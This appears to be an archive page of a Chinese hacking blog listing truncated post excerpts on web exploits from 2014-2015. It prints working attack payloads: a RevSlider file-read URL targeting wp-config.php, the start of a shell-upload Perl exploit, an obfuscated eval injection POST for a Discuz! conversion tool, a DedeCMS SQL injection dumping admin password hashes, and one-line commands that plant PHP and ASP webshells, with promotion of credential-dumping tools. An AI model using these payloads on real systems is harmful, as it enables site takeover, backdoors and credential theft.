PHP任意文件上传漏洞

分类:安全 | 2015-04-18 | 撸过 1,304 次
2人扯谈

漏洞细节:

这个漏洞存在于php中一个非常常用的函数中:move_uploaded_files,开发者总是用这个函数来移动上传的文件,这个函数会检查被上传的文件是否是一个合法的文件(是否是通过 HTTP 的 post 机制上传的),如果是合法的文件,则将它一定到指定目录中。

例子:

move_uploaded_file ( string $filename , string $destination )
这里的问题是,可以在文件名中插入空字符(之前多次修复过这个漏洞,比如CVE-2006-7243),利用插入空字符的方式,攻击者可以上传任意文件,引起远程代码执行漏洞等。

我这里用D[......]

继续阅读

WordPress幻灯片插件RevSlider漏洞利用

分类:安全 | 2015-04-18 | 撸过 1,173 次
0人扯谈

任意读取:

/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

 

任意上传

#!/usr/bin/perl
#
# Title: Slider Revolution/Showbiz Pro shell upload exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered: 15 October 2014
# Coded: 15 October 2014
# Upda[......]

继续阅读

IIS最新高危漏洞POC及在线检测源码-CVE-2015-1635-MS15-034

分类:安全 | 2015-04-18 | 撸过 1,422 次
0人扯谈

HTTP.sys远程执行代码漏洞(CVE-2015-1635,MS15-034)

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。https://technet.microsoft.com/zh-cn/library/security/MS15-034

 


[......]

继续阅读

全球黑客势力分布实时监控之数据可视化

分类:技术 | 2015-02-10 | 撸过 2,089 次
0人扯谈

也许互联网比我们想象的更加不安全,当今世界几乎无时不刻在发生着大大小小的黑客攻击事件。Norse是一家互联网安全服务商,如本文导图所示,它通过数据可视化的方式将全球各地黑客攻击行为动态地显示在地图上,直观的显示全球网络攻击行为的发起地点和目标地点。
此外它还提供相关数据的统计,比如攻击发起数量的国家排行,受攻击数量国家排行,以及攻击类型的排行,可以看到数据显示发起地前三位分别是:中国,美国和香港,受攻击排行分别是:美国,香港和台湾,而攻击方式的前三位为:ssh攻击,domain域名攻击, 微软数据库漏洞攻击(ms-sql-s),完整统计如下图所示(此数据因时间而异)。
[......]

继续阅读

Discuz!X系列转换工具任意代码写入漏洞 getshell

分类:安全 | 2015-02-10 | 撸过 3,477 次
1人扯谈

有些论坛 可能路径放在其它目录 没有utility 直接convert等

如果看到 转换程序的 data/ 目录不可写 就不用试了 不成功

http://webshell.cc/utility/convert/index.php?a=config&source=d7.2_x2.0

post提交:

a=config&source=d7.2_x2.0&submit=yes&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5baaa%0d%0a%0d%0aeval(Chr(101%29.Chr%28118%29.Chr%2897[......]

继续阅读

DedeCMS 20140201 之前的5.7通杀

分类:安全 | 2015-01-28 | 撸过 2,021 次
1人扯谈

无需注册会员账号:

Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'
or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select
CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`
limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type]
[type]=application/octet-stream&[......]

继续阅读

Quarks PwDump各种32位64系统获取HASH

分类:安全 | 2015-01-10 | 撸过 5,367 次
0人扯谈

Quarks PwDump 是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。作者开发这个工具的原因是现在没有一款工具能同时抓取所有类型的hash和Bitlocker信息。这个工具没有注入任何进程,工作原理是神马呢,源代码值得读一下。

它目前可以导出 :
– Local accounts NT/LM hashes + history 本机NT/LM哈希+历史登录记录
– Domain accounts NT/LM hashes + history 域中的NT/LM哈希+历史登录记录
–[......]

继续阅读

Adminer 适合扒裤子的mysql工具

分类:工具 | 2014-12-23 | 撸过 2,798 次
0人扯谈

Adminer是一个类似于phpMyAdmin的MySQL管理客户端。整个程序只有一个PHP文件,易于使用和安装。Adminer支持多语言(已自 带11种翻译语言文件,可以按自己的需求翻译相应的语言)。支持PHP4.3+,MySQL 4.1+以上的版本。

提供的功能包括:

1:创建,修改,删除索引/外键/视图/存储过程和函数。
2:查询,合计,排序数据。
3:新增/修改/删除记录。
4:支持所有数据类型,包括大字段。
5:能够批量执行SQL语句。
6:支持将数据,表结构,视图导成SQL或CSV。
7:能够外键关联打印数据库概要。
8:能够查看进程和关闭进程。
9:能够查看用户和权限并修改。[......]

继续阅读

wdcp面板爆严重漏洞附利用工具

分类:工具 | 2014-12-23 | 撸过 3,122 次
1人扯谈

QQ截图20141223133538

[......]

继续阅读

cmd生成webshell语句

分类:安全 | 2014-12-11 | 撸过 1,713 次
2人扯谈

linux:echo -e "<?@include(\\$_POST["c"]);?>" > webshell.cc.php 会再同目录下生成webshell.cc.php一句话 密码:c
win:      echo ^<%eval request("c")%^> >>webshell.cc.asp                   会再同目录下生成webshell.cc.asp一句话 密码:c

第 4 页,共 70 页« 最新...23456...102030...最旧 »